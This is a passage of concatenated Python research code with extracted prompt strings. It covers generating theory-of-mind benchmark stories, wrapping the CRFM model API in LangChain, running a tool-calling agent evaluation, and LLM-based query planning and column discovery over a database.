parser.add_argument('--condition', type=str, default='true_belief')
parser.add_argument('--eval_model', type=str, default='openai/text-davinci-003')
parser.add_argument('--model_name', type=str, default='openai/text-davinci-003')
parser.add_argument('--temperature', type=float, default=0.0)
parser.add_argument('--num_probs', '-n', type=int, default=1)
parser.add_argument('--offset', '-o', type=int, default=0)
parser.add_argument('--max_tokens', type=int, default=100)
parser.add_argument('--method', type=str, default='0shot')
parser.add_argument('--init_belief', type=str, default="0_backward")
parser.add_argument('--verbose', '-v', action='store_true')
parser.add_argument('--mcq', action='store_true')
args = parser.parse_args()
evaluate_condition(args.eval_model, args.model_name, args.temperature,
args.method, args.init_belief, args.variable,
args.condition, args.num_probs, args.max_tokens, args.verbose, args.mcq, args.offset)
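# Hypothetical invocation (a sketch; the flags come from the argparse setup above, the values are examples):
#   python evaluate_conditions.py --model_name openai/text-davinci-003 --eval_model openai/text-davinci-003 \
#       --method 0shot --init_belief 0_backward --variable belief --condition true_belief -n 10 --mcq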
if __name__ == '__main__':
main() | [
"../prompt_instructions"
] |
2024-01-10 | cicl-stanford/procedural-evals-tom | code~src~bigtom.py | import random
import csv
import tqdm
import argparse
from langchain.chat_models import ChatOpenAI
from langchain.schema import (
AIMessage,
HumanMessage,
SystemMessage
)
from utils import push_data, get_num_items, get_vars_from_out
letters = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L',
'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
DATA_DIR = '../../data'
PROMPT_DIR = '../prompt_instructions'
REPO_URL = 'https://github.com/cicl-stanford/marple_text'
CSV_NAME = 'bigtom/bigtom'
parser = argparse.ArgumentParser()
parser.add_argument('--model', type=str, default='gpt-4', help='model name')
parser.add_argument('--temperature', type=float, default=0.5, help='temperature')
parser.add_argument('--max_tokens', type=int, default=450, help='max tokens')
# change num completions to 10
parser.add_argument('--num_completions', type=int, default=1, help='number of completions')
parser.add_argument('--num_shots', type=int, default=3, help='number of shots')
parser.add_argument('--num_stories', type=int, default=1, help='number of stories to generate')
parser.add_argument('--verbose', action='store_true', help='verbose')
def get_llm(args):
llm = ChatOpenAI(
model=args.model,
temperature=args.temperature,
max_tokens=args.max_tokens,
n=args.num_completions,
request_timeout=180
)
return llm
def gen_chat(args):
response_template = """Here is the story:
Story: {story}
Aware of event: {awarenes}
Not aware of event: {not_aware}
Action given new state: {action_new}
Action given initial state: {action_init}
Belief Question: {belief_question}
Desire Question: {desire_question}
Action Question: {action_question}
Belief Aware: {belief_answer_aware}
Desire Aware: {desire_answer_aware}
Action Aware: {action_answer_aware}
Belief not Aware: {belief_answer_not_aware}
Desire not Aware: {desire_answer_not_aware}
Action not Aware: {action_answer_not_aware}
Random Event: {random_event}
Aware of random event: {aware_of_random_event}
Not aware of random event: {not_aware_of_random_event}"""
llm = get_llm(args)
with(open(f'{PROMPT_DIR}/bigtom.txt', 'r')) as f:
instruction_text = f.read()
system_message = SystemMessage(content=instruction_text)
# 2-shots by default
human_message_0 = HumanMessage(content='Generate a story')
letter = random.choice(letters)
human_message_1 = HumanMessage(content=f'Generate another story, using a different context, object states, and names than the examples did. The name must start with {letter}.')
examples = []
template_var = ["story", "awarenes", "not_aware", "action_new", "action_init", "belief_question", "desire_question", "action_question",
"belief_answer_aware", "desire_answer_aware", "action_answer_aware", "belief_answer_not_aware", "desire_answer_not_aware",
"action_answer_not_aware", "random_event", "aware_of_random_event", "not_aware_of_random_event"]
csv_file = f'{DATA_DIR}/{CSV_NAME}.csv'
prompt_tokens_used = 0
completion_tokens_used = 0
# run loop with n stories, increase by num_completions
for n_story in tqdm.tqdm(range(0, args.num_stories, args.num_completions)):
letter = random.choice(letters)
human_message_1 = HumanMessage(content=f'Generate another story, using a different context, object states, and names than the examples did. The name must start with {letter}.')
# read examples from csv file every iteration to add generated samples to the pool of seed examples
if args.verbose:
print(f"Reading examples from {csv_file} with existing {get_num_items(csv_file)} examples")
# read a few examples from the csv file
with open(csv_file, 'r') as f:
for line in f.readlines():
params = line.split(';')
example = {k: params[v].strip() for v, k in enumerate(template_var)}
examples.append(example)
random.shuffle(examples)
# 3-shots by default
messages = [system_message]
for i in range(args.num_shots):
messages.append(human_message_0)
messages.append(AIMessage(content=response_template.format(**examples[i])))
messages.append(human_message_1)
if args.verbose:
print(f"------ messages ------")
print(messages)
responses = llm.generate([messages])
prompt_tokens_used += responses.llm_output['token_usage']['prompt_tokens']
completion_tokens_used += responses.llm_output['token_usage']['completion_tokens']
price = (prompt_tokens_used * 0.03 + completion_tokens_used * 0.06) / 1000.
# update tqdm progress bar with price
tqdm.tqdm.write(f"Price: {price:.2f} USD, Price per story: {price/(n_story+args.num_completions):.2f} USD")
for g, generation in enumerate(responses.generations[0]):
# TODO: account for multiple completions
if args.verbose:
print(f"------ Generated Story {n_story+g} ------")
print(generation.text)
print("------------ Fin --------------")
list_var = ["Story", "Aware of event", "Not aware of event", "Action given new state", "Action given initial state", "Belief Question", "Desire Question", "Action Question",
"Belief Aware", "Desire Aware", "Action Aware", "Belief not Aware",
"Desire not Aware", "Action not Aware", "Random Event", "Aware of random event", "Not aware of random event"]
out_vars = get_vars_from_out(generation.text, list_var)
data = [out_vars[k] for k in list_var]
data += ["auto", 0]
# write to csv file
story_file = f'{DATA_DIR}/{CSV_NAME}.csv'
with open(story_file, 'a') as csvfile:
writer = csv.writer(csvfile, delimiter=';')
writer.writerow(data)
# push to github
# push_data(DATA_DIR, REPO_URL)
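# Hypothetical invocation (a sketch; assumes OPENAI_API_KEY is set and seed examples exist in ../../data/bigtom/bigtom.csv):
#   python bigtom.py --model gpt-4 --temperature 0.5 --num_stories 10 --num_shots 3 --verbose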
if __name__ == "__main__":
args = parser.parse_args()
print(f"Generating {args.num_stories} stories")
if args.verbose:
print(args)
gen_chat(args) | [
"0",
"token_usage",
"../prompt_instructions",
"Generate a story",
"['story', 'awarenes', 'not_aware', 'action_new', 'action_init', 'belief_question', 'desire_question', 'action_question', 'belief_answer_aware', 'desire_answer_aware', 'action_answer_aware', 'belief_answer_not_aware', 'desire_answer_not_aware', 'action_answer_not_aware', 'random_event', 'aware_of_random_event', 'not_aware_of_random_event']",
"Here is the story:\nStory: {story}\nAware of event: {awarenes}\nNot aware of event: {not_aware}\nAction given new state: {action_new}\nAction given initial state: {action_init}\nBelief Question: {belief_question}\nDesire Question: {desire_question}\nAction Question: {action_question}\nBelief Aware: {belief_answer_aware}\nDesire Aware: {desire_answer_aware}\nAction Aware: {action_answer_aware}\nBelief not Aware: {belief_answer_not_aware}\nDesire not Aware: {desire_answer_not_aware}\nAction not Aware: {action_answer_not_aware}\nRandom Event: {random_event}\nAware of random event: {aware_of_random_event}\nNot aware of random event: {not_aware_of_random_event}",
"Generate another story, using a different context, object states, and names than the examples did. The name must start with PLACEHOLDER.",
"prompt_tokens"
] |
2024-01-10 | cicl-stanford/procedural-evals-tom | code~src~crfm_llm.py | import os
import logging
import sys
from typing import (
Any,
Callable,
Dict,
Generator,
List,
Mapping,
Optional,
Set,
Tuple,
Union,
)
from pydantic import BaseModel, Extra, Field, root_validator
from langchain.llms.base import BaseLLM
from langchain.schema import Generation, LLMResult
from langchain.utils import get_from_dict_or_env
from helm.common.authentication import Authentication
from helm.common.perspective_api_request import PerspectiveAPIRequest, PerspectiveAPIRequestResult
from helm.common.request import Request, RequestResult
from helm.common.tokenization_request import TokenizationRequest, TokenizationRequestResult
from helm.proxy.accounts import Account
from helm.proxy.services.remote_service import RemoteService
from langchain.llms.base import LLM
from typing import Optional, List, Mapping, Any
class crfmLLM(LLM):
"""Wrapper around crfm large language models.
To use, you should have the ``crfm-helm`` python package installed, and the
environment variable ``CRFM_API_KEY`` set with your API key.
Any parameters that are valid to be passed to the openai.create call can be passed
in, even if not explicitly saved on this class.
Example:
.. code-block:: python
from crfm_llm import crfmLLM
openai = crfmLLM(model_name="openai/text-davinci-003")
"""
client: Any #: :meta private:
model_name: str = "openai/text-davinci-003"
"""Model name to use."""
temperature: float = 0.7
"""What sampling temperature to use."""
max_tokens: int = 300
"""The maximum number of tokens to generate in the completion.
-1 returns as many tokens as possible given the prompt and
the models maximal context size."""
top_p: float = 1
"""Total probability mass of tokens to consider at each step."""
frequency_penalty: float = 0
"""Penalizes repeated tokens according to frequency."""
presence_penalty: float = 0
"""Penalizes repeated tokens."""
num_completions: int = 1
"""How many completions to generate for each prompt."""
top_k_per_token: int = 1
"""number of candidates per token position in each completion"""
crfm_api_key: Optional[str] = None
max_retries: int = 5
"""Maximum number of retries to make when generating."""
echo_prompt: bool = False
"""Whether to echo the prompt in the response."""
verbose: bool = True
"""Whether to print out the prompt and response"""
@property
def _llm_type(self) -> str:
return "CRFM"
def _call(self, prompt: str,
stop: Optional[List[str]] = []) -> str:
# get api key from environment
if self.crfm_api_key is None:
self.crfm_api_key = os.getenv("CRFM_API_KEY")
auth = Authentication(api_key=self.crfm_api_key)
service = RemoteService("https://crfm-models.stanford.edu")
# Make a request
tries = 0
result = None
while tries < self.max_retries:
try:
tries += 1
if self.verbose:
print(prompt)
request = Request(model=self.model_name,
prompt=prompt,
temperature=self.temperature,
max_tokens=self.max_tokens,
top_p=self.top_p,
frequency_penalty=self.frequency_penalty,
presence_penalty=self.presence_penalty,
num_completions=self.num_completions,
top_k_per_token=self.top_k_per_token,
stop_sequences=stop,
)
request_result: RequestResult = service.make_request(auth, request)
result = request_result.completions[0].text
if self.verbose:
print('------------------')
print(result)
except Exception as e:
print(f"Error: {e}, retrying... ({tries}/{self.max_retries})")
continue
break
assert result is not None
return result
@property
def _identifying_params(self) -> Mapping[str, Any]:
"""Get the identifying parameters."""
return {"num_completions": self.num_completions,
"model_name": self.model_name,
"temperature": self.temperature,
"max_tokens": self.max_tokens,
"top_p": self.top_p,
"frequency_penalty": self.frequency_penalty,
"presence_penalty": self.presence_penalty,
"top_k_per_token": self.top_k_per_token,
"crfm_api_key": self.crfm_api_key,
"request_timeout": self.request_timeout,
"max_retries": self.max_retries,
"echo_prompt": self.echo_prompt,
}
def echo_prompt(self, prompt: str) -> LLMResult:
# get api key from environment
if self.crfm_api_key is None:
self.crfm_api_key = os.getenv("CRFM_API_KEY")
auth = Authentication(api_key=self.crfm_api_key)
service = RemoteService("https://crfm-models.stanford.edu")
request = Request(model=self.model_name,
prompt=prompt,
echo_prompt=True,
temperature=self.temperature,
max_tokens=0,
top_p=self.top_p,
frequency_penalty=self.frequency_penalty,
presence_penalty=self.presence_penalty,
num_completions=self.num_completions,
top_k_per_token=self.top_k_per_token,
)
request_result: RequestResult = service.make_request(auth, request)
result = request_result.completions[0]
return result | [
"False"
] |
2024-01-10 | davidfant/halpert | example~__main__.py | import json
import asyncio
import argparse
import logging
import coloredlogs
# from openai.types.chat import ChatCompletionMessageParam
from tqdm import tqdm
from typing import List, Dict
from halpert import Halpert, Sample, Function
from halpert.util.openai import complete
from .samples import samples
ChatCompletionMessageParam = Dict
logger = logging.getLogger('halpert')
async def run_agent(
sample: Sample,
functions: List[Function],
model: str,
) -> List[Sample.Evaluation.QuizItem]:
messages: List[ChatCompletionMessageParam] = [{
'role': 'system',
'content': 'You are a helpful AI assistant. Follow the instructions and use the available functions to complete the task. Always call functions, and never respond with a text message! Do not make any assumptions about the task, and do not use any outside knowledge.',
}, {
'role': 'user',
'content': sample.instructions,
}]
looping = True
while looping:
completion = complete(
messages=messages,
model=model,
tools=[{
'type': 'function',
'function': {
'name': f.slug,
'description': f.description,
'parameters': f.Input.schema(),
},
} for f in functions] + [{
'type': 'function',
'function': {
'name': 'done',
'description': 'Call this function when you are done with the task.',
'parameters': { 'type': 'object', 'properties': {} },
},
}],
)
# logger.info(f'Agent Step: {completion.json(indent=2)}')
logger.info(f'Agent Step: {json.dumps(completion, indent=2)}')
choice = completion.choices[0]
if choice.finish_reason != 'tool_calls':
logger.warning(f'Unexpected finish reason: {choice.finish_reason}')
break
messages.append({
'role': 'assistant',
# 'tool_calls': choice.message.dict()['tool_calls'],
'tool_calls': choice.message['tool_calls'],
})
for tc in choice.message.tool_calls:
if tc.function.name == 'done':
messages.pop()
looping = False
break
elif fn := next((f for f in functions if f.slug == tc.function.name), None):
output = await fn.call(fn.Input(**json.loads(tc.function.arguments)))
messages.append({
'role': 'tool',
'tool_call_id': tc.id,
'content': json.dumps(output.dict()),
})
logger.info(f'Function call: {fn.slug}({tc.function.arguments}) -> {json.dumps(output.dict(), indent=2)}')
else:
logger.warning(f'Unexpected function call: {tc.function.name}')
looping = False
break
completion = complete(
messages=[{
'role': 'system',
'content': 'You are a helpful AI assistant. Answer the questions based on the messages so far using the answer function. Question:\n' + '\n'.join([f'{i}. {q.question}' for i, q in enumerate(sample.expected.quiz)]),
}] + messages[1:],
tools=[{
'type': 'function',
'function': {
'name': 'answer',
'description': 'Call this function to answer all questions. If you do not know the answer to a specific question, enter an empty string. VERY IMPORTANT: answer all questions, even if you do not know the answer to some of them.',
'parameters': {
'type': 'object',
'properties': {
'num_questions': { 'type': 'integer' },
'answers': {
'type': 'array',
'items': { 'type': 'string' },
},
},
'required': ['answers'],
},
},
}],
model=model,
tool_choice={ 'type': 'function', 'function': { 'name': 'answer' } },
)
# logger.info(f'Agent Questions: {completion.json(indent=2)}')
logger.info(f'Agent Questions: {json.dumps(completion, indent=2)}')
answers = json.loads(completion.choices[0].message.tool_calls[0].function.arguments)['answers']
return [
Sample.Evaluation.QuizItem(question=q.question, answer=a)
for q, a in zip(sample.expected.quiz, answers)
]
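# Note (added for readability): the loop above follows the OpenAI tool-calling protocol:
# the assistant message carrying tool_calls is appended first, then one message with role
# 'tool' (including tool_call_id) per executed call, holding the JSON-encoded function output.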
async def run():
parser = argparse.ArgumentParser()
parser.add_argument('--model', type=str, default='gpt-4-1106-preview')
parser.add_argument('--odoo-snapshot-dir', type=str)
args = parser.parse_args()
coloredlogs.install(fmt='%(levelname)s %(asctime)s %(name)s %(message)s', level=logging.DEBUG)
logging.getLogger('openai').setLevel(logging.INFO)
logging.getLogger('httpx').setLevel(logging.INFO)
eval = Halpert(samples=samples, odoo_snapshot_dir=args.odoo_snapshot_dir)
for sample in tqdm(eval.samples):
sample_functions = eval.prepare(sample)
logger.info(f'Running sample: {sample.name}')
quiz = await run_agent(sample, sample_functions, args.model)
logger.info(f'Quiz: {json.dumps([q.dict() for q in quiz], indent=2)}')
eval.submit(sample, quiz)
eval.evaluate()
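# Hypothetical invocation (a sketch; the snapshot path is an assumption, not from the repo):
#   python -m example --model gpt-4-1106-preview --odoo-snapshot-dir ./snapshots/odoo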
if __name__ == '__main__':
asyncio.run(run())
| [
"You are a helpful AI assistant. Answer the questions based on the messages so far using the answer function. Question:\n",
"\n",
"You are a helpful AI assistant. Follow the instructions and use the available functions to complete the task. Always call functions, and never respond with a text message! Do not make any assumptions about the task, and do not use any outside knowledge."
] |
2024-01-10 | DataManagementLab/caesura | caesura~phases~mapping.py | import re
import logging
from langchain import LLMChain
from langchain.schema import AIMessage
from langchain.prompts.chat import HumanMessagePromptTemplate, ChatPromptTemplate, SystemMessagePromptTemplate
from caesura.phases.base_phase import ExecutionOutput, Phase
from caesura.phases.planning import PlanningPhase
from caesura.observations import ExecutionError, Observation, PlanFinished
from caesura.plan import ToolExecution, ToolExecutions
from caesura.utils import parse_args
logger = logging.getLogger(__name__)
class MappingPhase(Phase):
def create_prompt(self, tools):
result = ChatPromptTemplate.from_messages([
self.system_prompt(tools),
HumanMessagePromptTemplate.from_template(INIT_PROMPT),
])
return result
def system_prompt(self, tools):
result = "You are Data-GPT, and you execute informal query plans using a set of tools:\n"
result += self.database.describe()
result += "You can use the following tools:\n"
result += "\n".join([f"{t.name}: {t.description}" for t in tools])
result += "\n" + FORMAT_INSTRUCTIONS
return SystemMessagePromptTemplate.from_template(result)
def init_chat(self, query, tools, plan, relevant_columns, step_nr, **kwargs):
return self.create_prompt(tools).format_prompt(
query=query, plan=str(plan), tool_names=", ".join([t.name for t in tools]),
relevant_columns=relevant_columns.with_tool_hints(), plan_length=len(plan), step_nr=step_nr,
step_prompt=plan[0].get_step_prompt()
).messages
def execute(self, plan, step_nr, tools, chat_history, **kwargs):
if step_nr > len(plan):
raise PlanFinished
prompt = ChatPromptTemplate.from_messages(chat_history)
llm_chain = LLMChain(llm=self.llm, prompt=prompt)
step = plan[step_nr - 1]
ai_output = llm_chain.predict(stop=[f"Step {step_nr + 1}"])
chat_history += [AIMessage(content=ai_output)]
logger.info(ai_output)
tool_calls = self.parse_tool_calls(ai_output, tools, step)
step.set_tool_calls(tool_calls)
logger.info(f"Running: Step {step_nr}: {step}")
return ExecutionOutput(
state_update={"plan": plan, "step": step},
chat_history=chat_history,
)
def handle_observation(self, chat_history, observation, step_nr, plan, tools, query, **kwargs):
if step_nr > len(plan):
raise PlanFinished
human_message_template = STEP_PROMPT if step_nr <= len(plan) else "Step {step_nr}: Finished!"
if observation is not None and isinstance(observation, ExecutionError):
self.handle_error(observation, chat_history, query, plan)
elif observation is not None and isinstance(observation, Observation):
msg = observation.get_message()
if msg:
chat_history.append(msg)
step = plan[step_nr - 1]
chat_history.append(HumanMessagePromptTemplate.from_template(human_message_template).format(
step_nr=step_nr, step_prompt=step.get_step_prompt()))
return chat_history
def reinit_chat(self, observation, chat_history, plan, query, relevant_columns, tools, **kwargs):
chat_history.append(observation.get_message(suffix="\nPlease restart from Step 1"))
chat_history.append(HumanMessagePromptTemplate.from_template(INIT_PROMPT))
chat_history = ChatPromptTemplate.from_messages(chat_history).format_prompt(
query=query, plan=str(plan), tool_names=", ".join([t.name for t in tools]),
relevant_columns=relevant_columns.with_tool_hints(), plan_length=len(plan), step_nr=1,
step_prompt=plan[0].get_step_prompt()
).messages
return chat_history
def handle_error(self, error, chat_history, query, plan):
error_tool = ""
error_step = "one of the steps"
if error.step_nr is not None:
error_step = plan[error.step_nr - 1]
error_tool = ", ".join([e.tool.name for e in error_step.tool_execs])
error_tool = f"instead of {error_tool} "
error_step = f"Step {error.step_nr}"
msg = error.get_message(suffix= \
"\nThis was my request: {query} and this is the plan I imagined: {plan}\n\n"\
"To systematically fix this issue, answer the following questions one by one:\n"
"1. What are potential causes for this error? Think step by step.\n"
"2. Explain in detail how this error could be fixed.\n"
"3. Is there a flaw in my plan (e.g. steps missing, wrong input table, ...) (Yes/No)?\n"
"4. Is there a more suitable alternative plan (e.g. extracting information from image/text data instead of tabular metadata or vice versa) (Yes/No)?\n"
"5. Should a different tool {error_tool}be selected for {error_step} (Yes / No)?\n"
"6. Do the input arguments of some of the steps need to be updated (Yes / No)?\n"
)
prompt = ChatPromptTemplate.from_messages(chat_history + [msg])
chain = LLMChain(llm=self.llm, prompt=prompt)
answers = chain.predict(error_step=error_step, error_tool=error_tool, query=query, plan=plan.without_tools())
logger.warning(error)
logger.warning(answers)
fix_idea, wrong_plan_str1, wrong_plan_str2, wrong_tool, wrong_input_args = \
tuple(x.strip() for x in re.split(r"(^1\.|\n2\.|\n3\.|\n4\.|\n5\.|\n6\.)", answers)[slice(4, None, 2)])
error.set_fix_idea(fix_idea)
wrong_input_args, wrong_tool, wrong_plan1, wrong_plan2 = tuple(
"yes" in re.split(r"\W", x.lower())
for x in (wrong_input_args, wrong_tool, wrong_plan_str1, wrong_plan_str2)
)
if wrong_plan1 or wrong_plan2:
if wrong_plan1:
alternative_fix_idea = re.search(r"(^|\W)((Y|y)es)\W+(\w.+)\W", wrong_plan_str1)[4].strip(" .")
if wrong_plan2:
alternative_fix_idea = re.search(r"(^|\W)((Y|y)es)\W+(\w.+)\W", wrong_plan_str2)[4].strip(" .")
if len(alternative_fix_idea) > 5:
error.set_fix_idea(f"To fix the error: {alternative_fix_idea}.")
error.set_target_phase(PlanningPhase)
raise error
if wrong_tool:
error.set_target_phase(MappingPhase)
raise error
chat_history.append(error.get_message(suffix="\nPlease restart from Step 1"))
return chat_history
def parse_tool_calls(self, ai_out, tools, step):
tools_str = [re.split(r"[,\.\n\(\:]", x.strip())[0].strip() for x in re.split("Tool(| [0-9]+):", ai_out)[2::2]]
tool_map = {t.name: t for t in tools}
found_separator = self.check_for_multiple_tools(tools_str)
if found_separator:
tools_str = [x.strip() for t in tools_str for x in t.split(found_separator)]
args_str = [re.split("Tool(| [0-9]+):", x)[0].strip() for x in re.split("Arguments(| [0-9]+):", ai_out)[2::2]]
if found_separator:
args_str = [(x.strip() if x.strip().endswith(")") or not x.strip().startswith("(") else x.strip() + ")")
for a in args_str for x in a.split(")" + found_separator)]
args_str = [" ".join([line.strip() for line in x.split("\n")]) for x in args_str]
args_str = [parse_args(step, x) for x in args_str]
tools_plan = [tool_map[x] for x in tools_str]
tool_execs = ToolExecutions([ToolExecution(x, y) for x, y in zip(tools_plan, args_str)])
return tool_execs
def check_for_multiple_tools(self, tools_str):
separators = (" and ", ",", ";") # in case model decides to use more than one tool
found_separator = None
for t in tools_str:
for s in separators:
if s in t:
found_separator = s
break
if found_separator is not None:
break
return found_separator
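# Example of the model output that parse_tool_calls() expects (a sketch mirroring FORMAT_INSTRUCTIONS below;
# the step text and arguments are made up for illustration):
#   Step 2: Join the 'patients' and 'reports' tables on 'patient_id'.
#   Reasoning: Only the SQL tool can join two tables.
#   Tool: SQL
#   Arguments: (patients; reports; patient_id)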
STEP_PROMPT = "Step {step_nr}: {step_prompt}"
INIT_PROMPT = "Execute the steps one by one. {relevant_columns}. Take these into account when executing the tools.\n" + \
STEP_PROMPT
FORMAT_INSTRUCTIONS = (
"Use the following output format:\n"
"Step <i>: What to do in this step?\n"
"Reasoning: Reason about which tool should be used for this step. Take datatypes into account.\n"
"Tool: The tool to use, should be one of [{tool_names}]\n"
"Arguments: The arguments to call the tool, separated by ';'. Should be (arg_1; ...; arg_n)\n"
"(if you need more than one tool for this step, follow up with another Tool + Arguments.)"
)
# no improvements with these examples
#
# EXAMPLE_MAPPING = (
# """
# Example Mappings:
# Step X: Left Join the 'patient' and the 'patient_reports' table on the 'patient_id' column to combine the two tables.
# Reasoning: The SQL tool is the only tool that can join two tables.
# Tool: SQL
# Step X: Plot the 'result_table' in a bar plot. The 'diagnosis' should be on the X-axis and the 'mean_age' on the Y-Axis.
# Reasoning: Plots are generated using the 'Plot' tool.
# Tool: Plot
# Step X: Select all rows of the 'pictures' table where the 'image' column depicts a skateboard, by looking the the images.
# Reasoning: In this step, rows need to be selected based on the content of images. Hence, the Image Select tool is appropriate.
# Tool: Image Select
# Step X: Look at the images in the 'image' column of the 'joined_table' table to determine the number of depicted persons.
# Reasoning: Looking at images and extracting information from images (number of depicted persons) requires the use of the Visual Question Answering tool.
# Tool: Visual Question Answering
# """
# )
| [
"Step {step_nr}: Finished!",
"Step {step_nr}: {step_prompt}",
"Execute the steps one by one. {relevant_columns}. Take these into account when executing the tools.\nPLACEHOLDER"
] |
2024-01-10 | DataManagementLab/caesura | caesura~phases~discovery.py | from functools import reduce
import logging
import re
from collections import namedtuple
from langchain import LLMChain
from langchain.schema import AIMessage, HumanMessage, SystemMessage
from langchain.prompts.chat import HumanMessagePromptTemplate, ChatPromptTemplate, SystemMessagePromptTemplate
from caesura.phases.base_phase import ExecutionOutput, Phase
logger = logging.getLogger(__name__)
relevant_col_tuple = namedtuple("relevant_column", ["table", "column", "contains", "reasons"])
# no improvements with these examples
#
# EXAMPLE_DISCOVERY = """
# 3.0.1 The 'text_path' column (datatype str) is not relevant to the user's request, because the user didn't query the path and I am not able to open file paths or URLs.
# 3.0.2 No
# 3.1.1 The 'img_url' column (datatype str) is not relevant to the user's request, because the user didn't query the URL and I am not able to access files behind file paths or URLS.
# 3.1.2 No
# 3.2.1 The 'patient_name' column (datatype str) is not relevant, because the user requested to aggregate over patients. Therefore, the patient name is not necessary for the final plot.
# 3.2.2 No
# 3.3.1 The 'patient_report' column (datatype TEXT) is relevant because I am able to read texts in columns of datatype TEXT and the user-queried diagnosis can be extracted from a patient report.
# 3.3.2 Yes, TODO
# 3.4.1 The 'patient_picture' column (datatype IMAGE) is relevant, because I am able to look at images with datatype IMAGE and looking at patient's pictures allows me to determine their gender, which was queried.
# 3.4.2 Yes
# 3.5.1 The 'patient_scan' column (datatype IMAGE) is not relevant, because neither gender nor diagnosis can be determined by looking at the patients' scan.
# 3.5.2 No
# 3.0.1 The 'picture title' (datatype str) is relevant because the user queried for the pictures with the highest number of persons in it. The pictures are identified using their title.
# 3.0.2 Yes
# 3.1.1 The 'picture' (datatype IMAGE) is relevant, because it contains the actual picture necessary to determine the number of persons depicted in it.
# 3.1.2 Yes
# 3.2.1 The 'author' (datatype str) is not relevant, since the user didn't query for the author.
# 3.2.2 No
# 3.3.1 The 'size (kB)' (datatype int) is not relevant, since the user didn't query for the file size.
# 3.3.2 No
# 3.4.1 The 'creation date' (datatype date) is relevant, because the user likes to aggregate by year, which can be determined from the creation date.
# 3.4.2 Yes
# 3.5.1 The 'file path' (datatype str) column is not relevant, since I am not able to follow file paths. The user didn't query for the file path.
# 3.5.2 No
# 3.0.1 The 'img_path' column (datatype str) is not relevant, because I am not able to follow file paths and the user didn't query for the file path.
# 3.0.2 No
# 3.1.1 The 'image' column (datatype IMAGE) is relevant, because it contains the actual images and the user queried for pictures depicting skateboards. Furthermore, the user-queried 'picture perspective' can also be determined by looking at the image.
# 3.1.2 Yes
# """
class DiscoveryPhase(Phase):
def create_prompts(self):
result = {}
for table_name, table in self.database.tables.items():
chat = ChatPromptTemplate.from_messages([
self.system_prompt(table),
HumanMessagePromptTemplate.from_template("My request is: {query}.\n"
"In order to plan the steps to do, You must answer the following questions as precisely as possible.\n"
"1. If a plot is requested, what kind of plot is most suitable? What would be the best representation for the requested plot?"
" What exactly is plotted on the X and Y-Axis? Answer N/A if not applicable.\n"
"2. If a table is requested, what should be the columns of the table? What should be the rows of the table? Answer N/A if not applicable.\n"
"{relevance_questions}"
)
])
result[table_name] = chat
return result
def system_prompt(self, table):
text_columns = ", ".join([c for c in table.get_columns() if table.get_datatype_for_column(c) == "TEXT"])
image_columns = ", ".join([c for c in table.get_columns() if table.get_datatype_for_column(c) == "IMAGE"])
result = "You are Data-GPT, and you can tell users which database tables and columns are relevant for a user request. "
if image_columns:
result += f"You can look at images ({image_columns}) to determine which and how many objects are depicted in the image, and also determine things like the style and type of the image. "
if text_columns:
result += f"You can read and process texts ({text_columns}) to extract information from the text. "
result += "You cannot open file paths or URLs.\n"
# result += "You will be asked to answer a set of questions to determine the relevance of tables and columns. Here are some example answers: \n"
# result += EXAMPLE_DISCOVERY + "\n"
# result += "Now you have to answer similar questions for this Data:\n"
result += self.database.describe()
result += f"Table '{table.name}' =\n" + self.database.peek_table(table, example_text=True)
return SystemMessagePromptTemplate.from_template(result)
def get_prompt_global(self, query, relevant_columns):
system = "You are Data-GPT, and you can tell users which database tables and columns are relevant for a user request. "
system += f"You can look at images (Datatype IMAGE) to determine which and how many objects are depicted in the image, and also determine things like the style and type of the image. "
system += f"You can read and process texts (Datatype TEXT) to extract information from the text. "
system += "You cannot open file paths or URLs.\n"
system += self.database.describe()
system_message = SystemMessagePromptTemplate.from_template(system)
cols = ", ".join(f"{c.table}.{c.column} ({c.contains} {c.reasons})" for c in relevant_columns)
human = f"My request is: {query}. I consider these columns as relevant: {cols}. Answer these questions:\n" \
"1. Are these columns enough to satisfy the request or are there other relevant columns I missed? If they are sufficient, you can skip the other questions.\n" \
"2. Which other columns are relevant? Please provide them in this format:\n- table_1.col_1: <What does the column contain?>\n...\n- table_n.col_n: <What does the column contain?>\n"
human_message = HumanMessage(content=human)
return ChatPromptTemplate.from_messages([system_message, human_message])
def get_hint(self, c, pronoun):
dtype = self.database.get_column_datatype(c.table, c.column) if isinstance(c, relevant_col_tuple) else c
if dtype == "IMAGE":
return f"{pronoun} can easily extract structured information from these images."
if dtype == "TEXT":
return f"{pronoun} can easily extract structured information from these texts."
else:
return f"{pronoun} can transform these values or extract relevant parts, " \
"in case they are not yet in the right format."
def init_chat(self, query, **kwargs):
return {k: v.format_prompt(query=query, relevance_questions=self.get_relevance_questions(k)).messages
for k, v in self.create_prompts().items()}
def execute(self, query, chat_history, **kwargs):
relevant_columns = RelevantColumns(self.database, query, self.llm) if "relevant_columns" not in kwargs \
else kwargs["relevant_columns"]
for table_name, messages in chat_history.items():
if table_name == "__global__":
continue
prompt = ChatPromptTemplate.from_messages(messages)
llm_chain = LLMChain(llm=self.llm, prompt=prompt)
ai_output = llm_chain.predict()
chat_history[table_name].append(AIMessage(content=ai_output))
cols = self.parse_relevant_columns(table_name, ai_output, self.get_relevance_questions(table_name))
relevant_columns.extend(cols)
if "__global__" not in chat_history:
chat_history["__global__"] = self.get_prompt_global(query, relevant_columns).format_prompt().messages
prompt = ChatPromptTemplate.from_messages(chat_history["__global__"])
llm_chain = LLMChain(llm=self.llm, prompt=prompt)
ai_output = llm_chain.predict()
chat_history["__global__"].append(AIMessage(content=ai_output))
for table, column, desc in re.findall(r"- (\w+)\.(\w+): (.*)", ai_output.split("\n2.")[-1]):
if column.endswith("_id"):
continue
contains = desc.split(".")[0].split(", which")[0].strip()
relevant_columns.append(relevant_col_tuple(table, column, contains + ".", ""))
logger.info(relevant_columns)
return ExecutionOutput(
state_update={"relevant_columns": relevant_columns},
chat_history=chat_history,
)
def handle_observation(self, observation, chat_history, **kwargs):
msg = observation.get_message("Retry answering the above questions!")
result = {}
for table_name, messages in chat_history.items():
new_prompt = ChatPromptTemplate.from_messages([
*messages,
msg
])
result[table_name] = new_prompt.messages
return result
def reinit_chat(self, observation, chat_history, **kwargs):
raise NotImplementedError
def parse_relevant_columns(self, table_name, result, relevance_questions):
answers = [x.strip() for x in result.split("\n") if x.startswith("3")]
col_map = [x.split() for x in relevance_questions.split("\n") if x.startswith("3") and x.endswith("?")]
